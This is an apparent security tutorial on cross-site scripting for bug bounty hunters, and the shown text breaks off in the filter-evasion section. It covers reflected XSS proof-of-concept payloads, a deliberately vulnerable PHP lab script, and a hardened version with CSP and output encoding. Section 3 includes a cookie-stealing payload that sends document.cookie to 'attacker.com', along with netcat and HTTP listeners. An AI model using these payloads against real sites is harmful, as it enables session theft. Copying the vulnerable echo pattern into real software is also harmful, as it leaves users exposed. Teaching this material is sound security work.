Cross Site Scripting (XSS) Unleashed: The Silent Web Killer That Every Bug Hunter Must Master + Video


Introduction:

Cross Site Scripting (XSS) remains one of the most pervasive web vulnerabilities, allowing attackers to inject malicious client‑side scripts into trusted websites. When unsanitized user input is echoed back to a browser, an attacker can hijack sessions, deface pages, or redirect victims to phishing sites. Mastering XSS is non‑negotiable for any aspiring bug bounty hunter or application security professional.

Learning Objectives:

  • Distinguish between Reflected, Stored, and DOM‑based XSS with real‑world exploit scenarios.
  • Build a local vulnerable lab to safely test manual and automated XSS payloads.
  • Implement defensive coding techniques, Content Security Policies (CSP), and evasion countermeasures.

You Should Know:

  1. Anatomy of an XSS Attack: How a Single Script Can Hijack a Session
    This section explains the core mechanism of reflected XSS. A vulnerable web page takes a parameter (e.g., search query) and prints it directly into the HTML response without encoding. An attacker crafts a malicious link containing JavaScript; when a victim clicks it, the script executes in their browser.

Step‑by‑step guide:

  • Identify a reflection point: Use a simple payload like `test123` and look for its presence in the source code.
  • Inject the classic proof‑of‑concept: `<script>alert('XSS')</script>`.
  • Encode the payload for URL transmission: `%3Cscript%3Ealert(%27XSS%27)%3C/script%3E`.
  • Send the attack via curl (Linux/macOS):
    curl "http://vulnerable-site.com/search?q=%3Cscript%3Ealert(%27XSS%27)%3C/script%3E"
    
  • On Windows (PowerShell):
    Invoke-WebRequest -Uri "http://vulnerable-site.com/search?q=%3Cscript%3Ealert('XSS')%3C/script%3E"
    
  • Observe the alert box; if triggered, the site is vulnerable.
  2. Building Your XSS Lab: Setting Up a Safe Environment
    Never test on live sites without permission. Use a local virtual machine or Docker to host a deliberately vulnerable web app.

Step‑by‑step guide:

  • On Linux (Ubuntu/Debian):
    sudo apt update && sudo apt install apache2 php -y
    sudo systemctl start apache2
    echo '<?php echo "Search results for: " . $_GET["q"]; ?>' | sudo tee /var/www/html/xss_test.php
    
  • On Windows (using XAMPP):
    • Download and install XAMPP, start Apache.
    • Navigate to `C:\xampp\htdocs\` and create `xss_test.php` with the same PHP code.
  • Access the vulnerable script: http://localhost/xss_test.php?q=<script>alert(1)</script>.
  • To simulate a stored XSS, create a simple comment form that saves input to a text file and later displays it without sanitization.

  3. Advanced Payloads: From Alert to Cookie Stealer
    Moving beyond alerts, a real attacker steals session cookies to impersonate victims.

Step‑by‑step guide:

  • Craft a payload that extracts `document.cookie` and exfiltrates it to an attacker‑controlled server:
    <script>fetch('https://attacker.com/steal?cookie='+document.cookie)</script>
    
  • Set up a simple listener on your attack machine (Linux/macOS):
    python3 -m http.server 8080
    
  • On Windows (PowerShell, Python required):
    python -m http.server 8080
    
  • Alternatively, use netcat (Linux):
    nc -lvnp 8080
    
  • When the victim executes the payload, the cookie appears in the listener’s logs. For HTTPS exfiltration, use a tool like `ngrok` to expose a local server.
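The hardened counterpart of the lab script from section 2, written for this post as an added example (not code from the original): it neutralizes the reflected payload by output encoding, adds a Content Security Policy, and marks the session cookie HttpOnly so the exfiltration payload from section 3 cannot read it from `document.cookie`. Assumes PHP 7.3 or later under the Apache setup described above.

```php
<?php
// Hardened xss_test.php (added example, not from the original post).
// Assumes PHP 7.3+; header() calls must come before any output.

// 1. Content Security Policy: no inline <script>, scripts only from this
//    origin, and no fetch()/XHR to other origins. A reflected
//    <script>alert(1)</script> or a fetch('https://attacker.com/...') is
//    refused by the browser even if encoding is missed somewhere else.
header("Content-Security-Policy: default-src 'self'; script-src 'self'; "
     . "connect-src 'self'; object-src 'none'; base-uri 'none'");
header("X-Content-Type-Options: nosniff");

// 2. Keep the session cookie out of document.cookie, so the cookie
//    stealer from section 3 has nothing to read. Must run before session_start().
session_set_cookie_params([
    'httponly' => true,
    'secure'   => true,      // only sent over HTTPS
    'samesite' => 'Strict',
]);
session_start();

// 3. Encode untrusted input for the context it is written into.
//    This is correct for HTML body and attribute context only; a value
//    placed inside a <script> block or a URL needs a different encoder.
function escape_html(string $value): string
{
    // ENT_QUOTES encodes both ' and " so the result is also safe inside
    // quoted attribute values; ENT_HTML5 selects HTML5 entity handling.
    return htmlspecialchars($value, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

$query = $_GET['q'] ?? '';

// Vulnerable original from the lab, kept here only for comparison:
//   echo "Search results for: " . $_GET["q"];
// Hardened output: <script> arrives in the page as &lt;script&gt; and is
// rendered as literal text, never executed.
echo "Search results for: " . escape_html($query);
```

Requesting `http://localhost/xss_test.php?q=<script>alert(1)</script>` against this version shows the tag as text, and the response headers carry the CSP, which is what a reviewer should check for in any page that echoes a parameter.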
  4. Bypassing Filters: Evasion Techniques Every Red Teamer Needs
    Many applications filter `